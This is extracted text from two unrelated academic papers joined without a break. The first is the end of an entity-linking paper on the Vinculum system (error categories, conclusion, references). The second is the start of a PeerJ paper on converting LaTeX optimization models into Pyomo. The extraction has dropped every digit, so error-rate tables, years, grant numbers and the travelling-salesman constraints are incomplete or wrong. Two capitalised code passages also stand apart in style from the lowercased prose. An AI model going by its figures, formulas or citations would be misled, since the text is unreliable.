the differences in coreference and coherence are not cru- vinculum aida wikifier mention extraction ner ner ner, noun phrases candidate generation crosswikis an intra-wikipedia dictionary an intra-wikipedia dictionary entity types figer ner ner coreference find the representative mention - re-rank the candidates coherence link-based similarity, relation triples link-based similarity link-based similarity, relation triples learning unsupervised trained on aida trained on a wikipedia sample table : comparison of entity linking pipeline architectures. vinculum components are described in detail in section , and correspond to figure . components found to be most useful for vinculum are highlighted. cial to performance, as they each provide relatively small gains. finally, vinculum is an unsupervised system whereas aida and wikifier are trained on labeled data. reliance on labeled data can often hurt performance in the form of overfitting and/or incon- sistent annotation guidelines; aida’s lower perfor- mance on tac datasets, for instance, may be caused by the different data/label distribution of its train- ing data from other datasets (e.g. conll- con- tains many scoreboard reports without complete sen- tences, and the more specific entities as annotations for metonymic mentions). we analyze the errors made by vinculum and categorize them into six classes (table ). “metonymy” consists of the errors where the men- tion is metonymic but the prediction links to its lit- eral name. the errors in “wrong entity types” are mainly due to the failure to recognize the correct en- tity type of the mention. in table ’s example, the link would have been right if figer had correctly predicted the airport type. the mistakes by the coref- erence system often propagate and lead to the errors under the “coreference” category. the “context” cat- egory indicates a failure of the linking system to take into account general contextual information other than the fore-mentioned categories. “specific labels” refers to the errors where the gold label is a specific instance of a general entity, includes instances where the prediction is the parent company of the gold en- tity or where the gold label is the township whereas the prediction is the city that corresponds to the town- ship. “misc” accounts for the rest of the errors. in the example, usually the location name appearing in the byline of a news article is a city name; and vinculum, without knowledge of this convention, mistakenly links to a state with the same name. the distribution of errors shown in table pro- vides valuable insights into vinculum’s varying performance across the nine datasets. first, we ob- serve a notably high percentage of metonymy-related errors. since many of these errors are caused due to incorrect type prediction by figer, improvements in type prediction for metonymic mentions can provide substantial gains in future. the especially high per- centage of metonymic mentions in the aida datasets thus explains vinculum’s lower perfomance there (see table ). second, we note that vinculum makes quite a number of “context” errors on the tac and tac datasets. one possible reason is that when highly ambiguous mentions have been intentionally selected, link-based similarity and relational triples are insufficient for capturing the context. for exam- ple, in “... while returning from freeport to port- land. 
(tac)”, the mention “freeport”is unbounded by the state, one needs to know that it’s more likely to have both “freeport” and “portland” in the same state (i.e. maine) to make a correct prediction . another reason may be tac’s higher percentage of web documents; since contextual information is more scattered in web text than in newswire docu- ments, this increases the difficulty of context model- ing. we leave a more sophisticated context model for future work (chisholm and hachey, ; singh et al., ). since “specific labels”, “metonymy”, and “wrong entity types” correspond to the annotation issues discussed in sections . , . , and . , the distribution of errors are also useful in studying annotation inconsistencies. the fact that the er- rors vary considerably across the datasets, for in- stance, vinculum makes many more “specific labels” mistakes in ace and msnbc, strongly suggests that annotation guidelines have a consid- erable impact on the final performance. we also observe that annotation inconsistencies also cause reasonable predictions to be treated as a mistake, e.g. cucerzan ( ) use geo-coordinates as features. category example gold label prediction metonymy south africa managed to avoid a fifth successive defeat in at the hands of the all blacks ... south africa national rugby union team south africa wrong entity types instead of los angeles international, for example, consider flying into burbank or john wayne airport ... bob hope airport burbank, california coreference it is about his mysterious father, barack hussein obama, an imperious if alluring voice gone distant and then missing. barack obama sr. barack obama context scott walker removed himself from the race, but green never really stirred the passions of former walker supporters, nor did he garner out- sized support “outstate”. scott walker (politician) scott walker (singer) specific labels what we like would be seles , ( olympic champion lindsay ) davenport and mary joe fernandez . summer olympics olympic games misc new york - - new york city new york table : we divide linking errors into six error categories and provide an example for each class. error category tac tac tac t tac tac aida-dev aida-test ace msnbc metonymy . % . % . % . % . % . % . % . % . % wrong entity types . % . % . % . % . % . % . % . % . % coreference . % . % . % . % . % . % . % . % . % context . % . % . % . % . % . % . % . % . % specific labels . % . % . % . % . % . % . % . % . % misc . % . % . % . % . % . % . % . % . % # of examined errors table : error analysis: we analyze a random sample of of vinculum’s errors, categorize the errors into six classes, and display the frequencies of each type across the nine datasets. for example, aida predicts kb:west virginia mountaineers football for “..., alabama of- fered the job to rich rodriguez, but he decided to stay at west virginia. (msnbc)” but the gold label is kb:west virginia university. related work most related work has been discussed in the earlier sections; see shen et al. ( ) for an el survey. two other papers deserve comparison. cornolti et al. ( ) present a variety of evaluation measures and experimental results on five systems compared head- to-head. in a similar spirit, hachey et al. ( ) pro- vide an easy-to-use evaluation toolkit on the aida data set. in contrast, our analysis focuses on the prob- lem definition and annotations, revealing the lack of consistent evaluation and a clear annotation guide- line. 
we also show an extensive set of experimental results conducted on nine data sets as well as a de- tailed ablation analysis to assess each subcomponent of a linking system. conclusion and future work despite recent progress in entity linking, the com- munity has had little success in reaching an agree- ment on annotation guidelines or building a standard benchmark for evaluation. when complex el sys- tems are introduced, there are limited ablation studies for readers to interpret the results. in this paper, we examine el data sets and discuss the inconsisten- cies among them. to have a better understanding of an el system, we implement a simple yet effective, unsupervised system, vinculum, and conduct ex- tensive ablation tests to measure the relative impact of each component. from the experimental results, we show that a strong candidate generation component (crosswikis) leads to a surprisingly good result; us- ing fine-grained entity types helps filter out incorrect links; and finally, a simple unsupervised system like vinculum can achieve comparable performance with existing machine-learned linking systems and, therefore, is suitable as a strong baseline for future research. there are several directions for future work. we hope to catalyze agreement on a more precise el an- notation guideline that resolves the issues discussed in section . we would also like to use crowdsourc- ing (bragg et al., ) to collect a large set of these annotations for subsequent evaluation. finally, we hope to design a joint model that avoids cascading errors from the current pipeline (wick et al., ; durrett and klein, ). acknowledgements the authors thank luke zettle- moyer, tony fader, kenton lee, mark yatskar for constructive suggestions on an early draft and all members of the loudlab group and the lil group for helpful discussions. we also thank the action edi- tor and the anonymous reviewers for valuable com- ments. this work is supported in part by the air force research laboratory (afrl) under prime con- tract no. fa - - - , an onr grant n - - - , a wrf / tj cable professorship, a gift from google, an aro grant number w nf- - - , and by terraswarm, one of six centers of starnet, a semiconductor research corporation program sponsored by marco and darpa. any opinions, findings, and conclusion or recommenda- tions expressed in this material are those of the au- thor(s) and do not necessarily reflect the view of darpa, afrl, or the us government. references jonathan bragg, andrey kolobov, and daniel s weld. . parallel task routing for crowdsourcing. in sec- ond aaai conference on human computation and crowdsourcing. xiao cheng and dan roth. . relational inference for wikification. in emnlp. andrew chisholm and ben hachey. . entity disam- biguation with web links. transactions of the associa- tion for computational linguistics, : – . marco cornolti, paolo ferragina, and massimiliano cia- ramita. . a framework for benchmarking entity- annotation systems. in proceedings of the nd interna- tional conference on world wide web, pages – . international world wide web conferences steering committee. mark craven and johan kumlien. . constructing biological knowledge bases by extracting information from text sources. in proceedings of the seventh inter- national conference on intelligent systems for molecu- lar biology (ismb- ), pages – . s. cucerzan. . large-scale named entity disam- biguation based on wikipedia data. in proceedings of emnlp-conll, volume , pages – . silviu cucerzan. . 
the msr system for entity linking at tac . in text analysis conference . greg durrett and dan klein. . a joint model for en- tity analysis: coreference, typing, and linking. trans- actions of the association for computational linguis- tics, : – . paolo ferragina and ugo scaiella. . fast and ac- curate annotation of short texts with wikipedia pages. ieee software, ( ): – . j.r. finkel, t. grenager, and c. manning. . incor- porating non-local information into information extrac- tion systems by gibbs sampling. in proceedings of the rd annual meeting on association for compu- tational linguistics, pages – . association for computational linguistics. ben hachey, joel nothman, and will radford. . cheap and easy entity evaluation. in acl. hannaneh hajishirzi, leila zilles, daniel s. weld, and luke zettlemoyer. . joint coreference resolution and named-entity linking with multi-pass sieves. in emnlp. xianpei han and le sun. . an entity-topic model for entity linking. in proceedings of the joint confer- ence on empirical methods in natural language pro- cessing and computational natural language learn- ing, pages – . association for computational linguistics. zhengyan he, shujie liu, mu li, ming zhou, longkai zhang, and houfeng wang. a. learning entity rep- resentation for entity disambiguation. proc. acl . zhengyan he, shujie liu, yang song, mu li, ming zhou, and houfeng wang. b. efficient collective entity linking with stacking. in emnlp, pages – . johannes hoffart, mohamed a. yosef, ilaria bordino, ha- gen fürstenau, manfred pinkal, marc spaniol, bilyana taneva, stefan thater, and gerhard weikum. . robust disambiguation of named entities in text. in proceedings of the conference on empirical methods in natural language processing, pages – . as- sociation for computational linguistics. johannes hoffart, yasemin altun, and gerhard weikum. . discovering emerging entities with ambiguous names. in proceedings of the rd international confer- ence on world wide web, pages – . international world wide web conferences steering committee. raphael hoffmann, congle zhang, xiao ling, luke zettlemoyer, and daniel s weld. . knowledge- based weak supervision for information extraction of overlapping relations. in proceedings of the th an- nual meeting of the association for computational lin- guistics: human language technologies, volume , pages – . heng ji, ralph grishman, hoa trang dang, kira grif- fitt, and joe ellis. . overview of the tac knowledge base population track. in text analysis con- ference (tac ). mitchell koch, john gilmer, stephen soderland, and daniel s weld. . type-aware distantly supervised relation extraction with linked arguments. in emnlp. sayali kulkarni, amit singh, ganesh ramakrishnan, and soumen chakrabarti. . collective annotation of wikipedia entities in web text. in proceedings of the th acm sigkdd international conference on knowl- edge discovery and data mining, pages – . acm. heeyoung lee, angel chang, yves peirsman, nathanael chambers, mihai surdeanu, and dan jurafsky. . deterministic coreference resolution based on entity- centric, precision-ranked rules. computational linguis- tics, pages – . yang li, chi wang, fangqiu han, jiawei han, dan roth, and xifeng yan. . mining evidences for named entity disambiguation. in proceedings of the th acm sigkdd international conference on knowledge dis- covery and data mining, pages – . acm. xiao ling and daniel s weld. . fine-grained entity recognition. in aaai. james mayfield, javier artiles, and hoa trang dang. . 
overview of the tac knowledge base popu- lation track. text analysis conference (tac ). p. mcnamee and h.t. dang. . overview of the tac knowledge base population track. text analysis conference (tac ). pablo n mendes, max jakob, andrés garcı́a-silva, and christian bizer. . dbpedia spotlight: shedding light on the web of documents. in proceedings of the th international conference on semantic systems, pages – . acm. david milne and ian h. witten. . learning to link with wikipedia. in proceedings of the th acm con- ference on information and knowledge management, pages – . acm. andrea moro, alessandro raganato, and roberto navigli. . entity linking meets word sense disambiguation: a unified approach. transactions of the association for computational linguistics, . lev-arie ratinov, dan roth, doug downey, and mike anderson. . local and global algorithms for dis- ambiguation to wikipedia. in acl, volume , pages – . sebastian riedel, limin yao, and andrew mccallum. . modeling relations and their mentions without labeled text. in ecml/pkdd ( ), pages – . wei shen, jianyong wang, and jiawei han. . entity linking with a knowledge base: issues, techniques, and solutions. tkde. avirup sil and alexander yates. . re-ranking for joint named-entity recognition and linking. in pro- ceedings of the nd acm international conference on conference on information & knowledge management, pages – . acm. sameer singh, amarnag subramanya, fernando pereira, and andrew mccallum. . wikilinks: a large- scale cross-document coreference corpus labeled via links to wikipedia. technical report, university of massachusetts amherst, cmpsci technical report, um-cs- - . valentin i spitkovsky and angel x chang. . a cross- lingual dictionary for english wikipedia concepts. in lrec, pages – . . tac kbp entity selection. http://www.nist. gov/tac/ /kbp/task_guidelines/ tac_kbp_entity_selection_v . .pdf. michael wick, sameer singh, harshal pandya, and an- drew mccallum. . a joint model for discovering and linking entities. in cikm workshop on automated knowledge base construction (akbc). jiaping zheng, luke vilnis, sameer singh, jinho d. choi, and andrew mccallum. . dynamic knowledge- base alignment for coreference resolution. in confer- ence on computational natural language learning (conll). http://www.nist.gov/tac/ /kbp/task_guidelines/tac_kbp_entity_selection_v . .pdf http://www.nist.gov/tac/ /kbp/task_guidelines/tac_kbp_entity_selection_v . .pdf http://www.nist.gov/tac/ /kbp/task_guidelines/tac_kbp_entity_selection_v . .pdf submitted june accepted august published september corresponding author lazaros g. papageorgiou, l.papageorgiou@ucl.ac.uk academic editor marian gheorghe additional information and declarations can be found on page doi . /peerj-cs. copyright triantafyllidis and papageorgiou distributed under creative commons cc-by . open access an integrated platform for intuitive mathematical programming modeling using latex charalampos p. triantafyllidis , and lazaros g. papageorgiou centre for process systems engineering, department of chemical engineering, university college london, london, united kingdom smith school of enterprise and the environment, university of oxford, oxford, united kingdom abstract this paper presents a novel prototype platform that uses the same latex mark-up language, commonly used to typeset mathematical content, as an input language for modeling optimization problems of various classes. 
the platform converts the latex model into a formal algebraic modeling language (aml) representation based on pyomo through a parsing engine written in python and solves by either via neos server or locally installed solvers, using a friendly graphical user interface (gui). the distinct advantages of our approach can be summarized in (i) simplification and speed-up of the model design and development process (ii) non-commercial character (iii) cross-platform support (iv) easier typo and logic error detection in the description of the models and (v) minimization of working knowledge of programming and amls to perform mathematical programming modeling. overall, this is a presentation of a complete workable scheme on using latex for mathematical programming modeling which assists in furthering our ability to reproduce and replicate scientific work. subjects optimization theory and computation, scientific computing and simulation, programming languages, software engineering keywords pyomo, python, algebraic modeling languages, mathematical programming, optimization, latex introduction mathematical modeling constitutes a rigorous way of inexpensively simulating complex systems’ behavior in order to gain further understanding about the underlying mechanisms and trade-offs. by exploiting mathematical modeling techniques, one may manipulate the system under analysis so as to guarantee its optimal and robust operation. the dominant computing tool to assist in modeling is the algebraic modeling languages (amls) (kallrath, ). amls have been very successful in enabling a transparent development of different types of models, easily distributable among peers and described with clarity, effectiveness and precision. software suites such as aimms (bisschop & roelofs, ), gams ide (mccarl et al., ), jump (dunning, huchette & lubin, ) as the modeling library in julia (lubin & dunning, ), pyomo (http://www.pyomo.org/) (hart et al., ; hart, watson & woodruff, ) for modeling in python (https://www.python.org/), (rossum, ) and ampl (fourer, gay how to cite this article triantafyllidis and papageorgiou ( ), an integrated platform for intuitive mathematical programming model- ing using latex. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:l.papageorgiou@ucl.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://www.pyomo.org/ https://www.python.org/ http://dx.doi.org/ . /peerj-cs. figure the levels of abstraction in modeling; from natural language to extracting the optimal solu- tion via computational resources. full-size doi: . /peerjcs. /fig- & kernighan, ) are the most popular and widely used in both academia and industry. amls usually incorporate the following features: • a strict and specific syntax for the mathematical notation to describe the models; • solver interfaces, the bridge between mathematics and what the solver can understand in terms of structural demands; • a series of available optimization solvers for as many classes of problems as supported (lp, milp, minlp etc.) with the associated functional interfaces implemented; • explicit data file formats and implementation of the respective import/export mechanisms. amls provide a level of abstraction, which is higher than the direct approach of generating a model using a programming language. the different levels in the design process of a model are depicted in fig. . 
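To illustrate the level of abstraction an AML offers, a minimal Pyomo fragment of the kind the platform ultimately emits is shown below; the set, parameter and variable names are generic placeholders and the snippet is not taken from the platform itself:

from pyomo.environ import (AbstractModel, Set, Param, Var, Objective,
                           NonNegativeReals, minimize)

# Sets, parameters and variables are declared symbolically; the data that
# populates them is supplied separately, e.g. through an AMPL-format .dat file.
model = AbstractModel()
model.I = Set()
model.J = Set()
model.c = Param(model.I, model.J)
model.x = Var(model.I, model.J, domain=NonNegativeReals)

def obj_rule(m):
    return sum(m.c[i, j] * m.x[i, j] for i in m.I for j in m.J)

model.obj = Objective(rule=obj_rule, sense=minimize)

The model is stated once in symbolic form and instantiated later with whatever data set is supplied, which is precisely the separation of model and data that the platform targets.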
extending an aml (or even the entire modeling design process)canbe doneinthefollowing twoways: wecaneithersimplifythe presentframework (vertical abstraction) or extend the embedded functionality (horizontal abstraction) (jackson, ). the layers of abstraction between the conception and the semantics of a mathematical model and its computational implementation may not necessarily be thin. this means that while eventually the aim of the presented platform has the same purpose as an aml that is to generate and solve models, simplification of the required syntax to describe the model is associated with higher complexity. thus, in order to relax the syntactical requirements, we have to be able to process the same model with limited information (for instance, we do not declare index sets and parameters in the platform). this limited declaration of model components elevates the amount of processing that the platform has to conduct in order to provide equivalent formulations of the input. triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a systems approach, mosaic (erik et al., ), has been developed based on a mathml representation using latex extracts, which has been applied mainly to chemical engineering models. both frameworks can be facilitated online, with the proposed framework built on django while mosaic on java. it can be noted that our platform can also be run off-line (locally). a key difference between the two is that in the proposed framework the user does not explicitly define indices, parameters and dynamic sets as those are identified automatically from the platform, by filtering them out from the variable list given at the bottom of the input .tex model. in the proposed platform the user can capture the entire optimization model in a single .tex file and use this directly as an input to the platform as opposed of using latex extracts for generating equations in mosaic. similarly though, both platforms are framing the use of latex built-in commands for the specific environment to better capture errors and provide more consistency. finally, the proposed platform exports the generated optimization model in pyomo whereas the ability to export in many other formats is given in the mosaic environment. our work expands upon two axes: (i) the programming paradigm introduced by donald e. knuth (knuth, ) on literate programming and (ii) the notions of reproducible and replicable research, the fundamental basis of scientific analysis. literate programming focuses on generating programs based on logical flow and thinking rather than being limited by the imposing syntactical constraints of a programming language. in essence, we employ a simple mark-up language, latex, to describe a problem (mathematical programming model) and then in turn produce compilable code (pyomo abstract model) which can be used outside of the presented prototype platform’s framework. reproducibility and the ability to replicate scientific analysis is crucial and challenging to achieve. as software tools become the vessel to unravel the computational complexity of decision-making, developing open-source software is not necessarily sufficient; the ability for the averagely versed developer to reproduce and replicate scientific work is very important to effectively deliver impact (leek & peng, ; nature methods editorial board, ). 
to quote the coin-or foundation (https://www.coin-or.org/), science evolves when previous results can be easily replicated. in the endeavor of simplifying the syntactical requirements imposed by amls we have developed a prototype platform. this new framework is materializing a level of modeling design that is higher than the amls in terms of vertical abstraction. it therefore strengthens the ability to reproduce and replicate optimization models across literature for further analysis by reducing the demands in working knowledge of amls or coding. the key capability is that it parses latex formulations of mathematical programs (optimization problems) directly into pyomo abstract models. the framework then combines the produced abstract model with data provided in the ampl .dat format (containing parameters and sets) to produce a concrete model. this capability is provided through a graphical interface which accepts latex input and ampl data files, parses a pyomo model, solves with a selected solver (cplex, glpk, or the neos server), and returns the optimal solution if feasible, as the output. the aim is not to substitute but to establish a link between those using a higher level of abstraction. therefore, the platform does not eliminate the use of an aml or the advantages emanating from it. triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.coin-or.org/ http://dx.doi.org/ . /peerj-cs. this is a complete prototype workable scheme to address how latex could be used as an input language to perform mathematical programming modeling, and currently supports linear programming (lp), mixed-integer linear programming (milp) as well as mixed-integer quadratic programming (miqp) formulations. linear optimization (bertsimas & tsitsiklis, ; williams, ) has proven to be an invaluable tool for decision support. the corpus of models invented for linear optimization over the past decades and for a multitude of domains has been consistently increasing. it can be easily demonstrated with examples in machine learning, operations research and management science, physics, information security, environmental modeling and systems biology among many others (yang et al., ; tanveer, ; silva et al., ; sitek & wikarek, ; liu & papageorgiou, ; triantafyllidis et al., ; cohen et al., ; romeijn et al., ; mitsos et al., ; melas et al., ; kratica, dugošija & savić, ; mouha et al., ). this paper is organized as follows: in ‘functionality’, we describe the current functionality supported by the platform at this prototype stage. in ‘parser - execution engine’, we present the implementation details of the parser. ‘an illustrative parsing example’ provides a description of an illustrative example. a discussion follows in ‘discussion’. some concluding remarks are drawn in ‘conclusion’. examples of optimization models that were reproduced from scientific papers as well as their corresponding latex formulations and pyomo models can be found in the supplemental information . functionality the set of rules that are admissible to formulate models in this platform are formal latex commands and they do not represent in-house modifications. we assume that the model will be in the typical format that optimization programs commonly appear in scientific journals. therefore, the model must contain the following three main parts and with respect to the correct order as well: . the objective function to be optimized (either maximized or minimized); . 
the (sets of) constraints, or else the relationships between the decision variables and coefficients, right-hand side (rhs); . the decision variables and their domain space. we used the programming environment of python coupled with its modeling library, namely pyomo. similar approaches in terms of software selection have been presented for differential and algebraic equations (dae) modeling and optimization in (nicholson et al., ; nikolić, ). by combining python and pyomo we have the ability to transform a simplified representation of a mathematical model initially written in latex into a formal aml formulation and eventually optimize it. in other words, the platform reads latex code and then writes pyomo abstract models or the code generates code. the resulting .py file is usable outside of the platform’s frame, thus not making the binding and usage of these two necessary after conversion. the main components that we employed for this purpose are the following: triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure the simplified graphical user interface (gui). the gui contains the basic but fundamental options to use the platform, such as model input, solver selection and solution extraction. full-size doi: . /peerjcs. /fig- • front-end: html, javascript, mathjax (https://www.mathjax.org/) and google polymer (https://www.polymer-project.org/); • back-end: python with django (https://www.djangoproject.com/) and pyomo. in order to increase the effectiveness and user-friendliness of the platform, a graphical- user interface (gui) based on html, javascript (front-end) and django as the web- framework (back-end) has been implemented, as shown in fig. . the user-input is facilitated mainly via polymer objects (https://www.polymer-project.org/). as the main feature of the platform is to allow modeling in latex language, we used mathjax as the rendering engine. in this way, the user can see the compiled version of the input model. all of these components form a single suite that works across different computational environments. the front-end is plain but incorporates the necessary functionality for input and output, as well as some solver options. the role of the back-end is to establish the communication between the gui and the parser with the functions therein. in this way the inputs are being processed inside python in the background, and the user simply witnesses a seamless working environment without having to understand the black-box parser in detail. triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.mathjax.org/ https://www.polymer-project.org/ https://www.djangoproject.com/ https://www.polymer-project.org/ http://dx.doi.org/ . /peerj-cs. the main components of the gui are: • abstract model input: the input of the latex model, either directly inside the polymer input text-box or via file upload (a .tex containing the required source latex code) • data files: the input of the data set which follows the abstract definition of the model via uploading the ampl-format (.dat) data file • solver options: an array of solver - related options such as: . neos server job using cplex . solve the relaxed lp (if milp) . select gplk (built-in) as the optimization solver . 
select cplex (if available) as the optimization solver (currently set to default) the following is an example of a latex formulated optimization problem which is ready to use with the platform; the well-known traveling salesman problem (tsp) (applegate et al., ): minimize ∑ i,j:i =j (di,jxi,j) subject to : ∑ j:i =j (xi,j)= ∀i ∑ i:i =j (xi,j)= ∀j ui−uj+nxi,j ≤n− ∀i≥ ,j≤|j|− ,i = j u∈z,x ∈{ , } and the raw latex code used to generate this was: \ t e x t { minimize } \ sum \ l i m i t s _ { i , j : i \ neq j }^{} ( d_ { i , j } x_ { i , j } ) \ \ \ t e x t { s u b j e c t to : } \ \ \ sum \ l i m i t s _ { j : i \ neq j }^{} ( x_ { i , j } ) = \ quad \ quad \ f o r a l l i \ \ \ sum \ l i m i t s _ { i : i \ neq j }^{} ( x_ { i , j } ) = \ quad \ quad \ f o r a l l j \ \ u_ { i } − u_ { j } + nx_ { i , j } \ l e q n − \ quad \ quad \ f o r a l l i \ geq , j \ l e q | j |− , i \ neq j \ \ u \ in \ mathbb z , x \ in \ { , \ } \ \ which is the input for the platform. the user can either input this code directly inside the google polymer text box or via a pre-made .tex file which can be uploaded in the corresponding field of the gui. either way, the mathjax engine then renders latex appropriately so the user can see the resulting compiled model live. subject to syntax- errors, the mathjax engine might or might not render the model eventually, as naturally expected. empty lines or spaces do not play a role, as well as commented-out lines using the standard notation (the percentage symbol %). the model file always begins with the objective function sense, the function itself, and then the sets of constraints follow, with the variables and their respective type at the end of the file. triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the overall flow of the implementation. from user input to solving the optimization problem or simply exporting the equivalent pyomo model file. full-size doi: . /peerjcs. /fig- parser—execution engine as parser we define the part of the code (a collection of python functions) in the back-end side of the platform which is responsible for translating the model written in latex to pyomo, the modeling component of the python programming language. in order to effectively translate the user model input from latex, we need an array of programming functions to carry out the conversion consistently since preserving the equivalence of the two is implied. the aim of the implementation is to provide minimum loss of generality in the ability to express mathematical notation for different modeling needs. a detailed description of the implemented scheme is given in fig. . a modular design of different functions implemented in python and the established communication of those (exchanging input and output-processed data) form the basic implementation concept. this type of design allows the developers to add functionality in a more clear and effective way. for instance, to upgrade the parser and support mixed integer quadratic programming (miqp) problems, an update only to the parsing function assigned to convert the optimization objective function is required. once the .tex model file and the .dat ampl formatted data file are given, the platform then starts processing the model. the conversion starts by reading the variables of the model and their respective types, and then follows with component identification triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. (locating the occurrence of the variables in each constraint) and their inter-relationships (multiplication, division, summation etc.). additionally, any summation and constraint conditional indexing schemes will be processed separately. constraint-by-constraint the parser gradually builds the .py pyomo abstract model file. it then merges through pyomo the model with its data set and calls the selected solver for optimization. pre-processing a significant amount of pre-processing takes place prior of parsing. the minimum and essential is to first tidy up the input; that is, clear empty lines and spaces, as well as reserved (by the platform) keywords that the user can include but do not play any role in functional parsing (such as the \quad command). the platform also supports the use of greek letters. for instance, if a parameter is declared as α the platform identifies the symbol, removes the backslash and expects to find alpha in the data-file. this takes place also in the pre-processing stage. the user can also opt-out selectively the constraints by putting regular comments in latex, with the insertion of the percentage symbol (%) in the beginning of each expression. once done, we attempt to simplify some types of mathematical expressions in order to be able to better process them later on. more specifically, we have two main functions that handle fractions and common factor (distributive expressions) simplifications. for example: aibj di is then converted to: (aibj)/di and β(α+ ) is converted as expected to: βα+β when handling fractions, the user can employ the frac environment to generate them; the parser in the background always though processes the analytic form (the same applies with the distributive form of multiplications), no matter if the initial input was done using the frac environment. this keeps the basic component identification functions intact, since their input is transformed first to the acceptable analytical format. instead of transforming the parsing functions, we transform the input in the acceptable format. however, the user does not lose either functionality or flexibility, as this takes place in the background. to put it simply, either the user inputs the analytic form of an expression or the compact, the parser is still able to function correctly. to frame the capabilities of the parser, we will now describe how the user can define optimization models in the platform with a given example and the successful parsing to pyomo. the parser first attempts to split the model into its three major distinct parts: • the objective function • the sets of constraints • the types of the variables defined these three parts are in a way independent but interconnected as well. triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. processing variables the parser first attempts to read the variables and their respective domain space (type). the platform is case sensitive since it is based on pyomo. the processing is done using string manipulation functions, therefore the use of regular expressions in python was essential and effective. reasonably, the focus was on consistency and reliability, rather computational performance mainly due to the lightweight workload of the processing demands in general. 
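A simplified stand-in for the expression pre-processing described above is sketched below; the regular expression and function name are illustrative and do not reproduce the platform's actual routines:

import re

# Rewrite every \frac{numerator}{denominator} occurrence into its analytic form
# "(numerator)/(denominator)" so that the later component-identification
# functions only ever see one format. Nested braces (e.g. a_{i}) are not
# handled by this simplified pattern.
FRAC = re.compile(r"\\frac\{([^{}]+)\}\{([^{}]+)\}")

def expand_fractions(expr):
    return FRAC.sub(r"(\1)/(\2)", expr)

print(expand_fractions(r"\frac{a_i b_j}{d_i}"))   # -> (a_i b_j)/(d_i)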
in order to do that, the parser uses keywords as identifiers while scanning from the top to the bottom of the manually curated .tex file which contains the abstract model in latex. for the three respective different parts mentioned earlier, the corresponding identifiers are: . objective function: {minimize, maximize} . sets of constraints: {\leq, \geq, =} . variables and their types: {\mathbb , { , }} this helps separate the processing into sections. each section is analyzed and passes the information in pyomo syntax in the .py output model file. variable types can appear in the following way: • \in \mathbb r for real numbers (∈r) • \in \mathbb r_+ for non-negative real numbers (∈r+) • \in \mathbb r_{*}^{+} for positive real numbers (∈r+ ∗ ) • \in \{ , \} for binary variables (∈{ , }) • \in \mathbb z for integers (∈z) • \in \mathbb z_+ for non-negative integers (∈z+) • \in \mathbb z_{*}^{+} for positive integers (∈z+ ∗ ) in order to avoid confusion between lowercase and uppercase, the identifiers are converted to uppercase prior of comparison. upon locating these keywords, the parser separates the processing and starts calling the corresponding functions. once the variables and their types are processed (expected to be found at the bottom of the mathematical definition of the model), the parser then creates a list of strings for the names of the variables. this is one of the crucial structures of the parser and utilized alongside the entire run-time of the conversion process. a list of the same length, which holds the types of each respective variable, is also created. the platform in general uses python lists to store information about variables, index sets, parameters, scalars etc. decomposing constraints and objective function expressions our approach for understanding the inter-mathematical relationships between the variables and the parameters relied on exploiting the fundamental characteristics of linear programming: triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a simple constraint having its components (partially) decomposed and therefore identified; summations, operators, scalars and numerical quantities. full-size doi: . /peerjcs. /fig- • proportionality • additivity • divisibility these mathematical relationships can help us understand the structure of the expressions and how to decompose them. by decomposition we define the fragmentation of each mathematical expression at each line of the .tex input model file into the corresponding variables, parameters, summations etc. so as we can process the given information accordingly. a simple graphical example is given in fig. . the decomposition with the regular expressions is naturally done via the strings of the possible operators found, that is: addition, subtraction, division (+,−,/), since the asterisk to denote multiplication (∗or ·) is usually omitted in the way we describe the mathematical expressions (e.g., we write ax to describe coefficient a being multiplied by variable x). in some cases however it is imperative to use the asterisk to decompose a multiplication. for example, say ds is a parameter and s is also a variable in the same model. there is no possible way to tell whether the expression ds actually means d*s or if it is about a new parameter altogether, since the parameters are not explicitly defined in the model definition (as in amls). 
adding to that the fact that for the scalars there is no associated underscore character to identify the parameter as those are not associated with index sets, the task is even more challenging. therefore, we should write d*s if d is a scalar. as for parameters with index sets, for example dsisi causes no confusion for the parser because the decomposition based on the underscore character clearly reveals two separate components. in this way, the platform also identifies new parameters. this means that since we know, for instance, that s is a variable but ds is not, we can dynamically identify ds on the fly (as triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. we scan the current constraint) as being a parameter which is evidently multiplied with variable s, both having index set i associated with them. however, we need to pay attention on components appearing iteratively in different or in the same sets of constraints; did we have the component already appearing previously in the model again? in that case we do not have to declare it again in the pyomo model as a new quantity, as that would cause a modeling error. by declaration we mean the real-time execution of a python command that creates the associated terms inside the pyomo abstract objected-oriented (oo) model. for instance if a set i is identified, the string model.i=set(dimen= ) is first written inside the text version of the pyomo model file, and then on-the-fly executed independently inside the already parsing python function using the exec command. the execution commands run in a sequential manner. all the different possible cases of relationships between parameters and variables are dynamically identified, and the parser keeps track of the local (per constraint) and global (per model) list of parameters identified while scanning the model in dynamically growing lists. dynamic identification of the parameters and index sets is one of the elegant features of the platform, since in most algebraic modeling languages (amls) the user explicitly defines the model parameters one-by-one. in our case, this is done in an intelligent automated manner. another important aspect of the decomposition process is the identification of the constraint type (<=,=,>=), since the position of the operator is crucial to separate the left and the right hand side of the constraint. this is handled by an independent function. decomposition also 